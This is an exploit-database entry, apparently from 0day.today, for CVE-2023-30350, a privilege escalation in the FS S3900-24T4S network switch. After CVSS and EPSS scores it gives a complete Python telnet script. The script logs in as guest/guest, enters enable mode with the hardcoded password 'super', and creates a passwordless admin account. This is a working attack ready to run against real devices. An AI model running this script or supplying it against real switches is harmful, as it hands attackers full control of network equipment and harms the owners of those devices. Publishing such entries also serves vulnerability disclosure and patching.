FS-S3900-24T4S - Privilege Escalation Exploit

2023-05-0200:00:00

Daniele Linguaglossa

0day.today

177

fs-s3900-24t4s

privilege escalation

exploit

telnet

cve-2023-30350

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS

0.003

Percentile

71.0%

JSON

# Exploit Title: FS-S3900-24T4S Privilege Escalation
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350

import sys
import telnetlib


def exploit(args):
    print(args)
    if len(args) != 1:
        print(f"Usage: {sys.argv[0]} <ip>")
        sys.exit(1)
    else:
        ip = args[0]
        try:
            with telnetlib.Telnet(ip, 23) as tn:
                try:
                    tn.read_until(b"Username: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b">")
                    tn.write(b"enable\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"super\r\n")
                    tn.read_until(b"#")
                    tn.write(b"configure terminal\r\n")
                    tn.read_until(b"(config)#")
                    tn.write(b"username admin nopassword\r\n")
                    tn.read_until(b"(config)#")
                    print(
                        "Exploit success, you can now login with username: admin and password: <empty>")
                    tn.close()
                except KeyboardInterrupt:
                    print("Exploit failed")
                    tn.close()
        except ConnectionRefusedError:
            print("Connection refused")


if __name__ == "__main__":
    exploit(sys.argv[1:])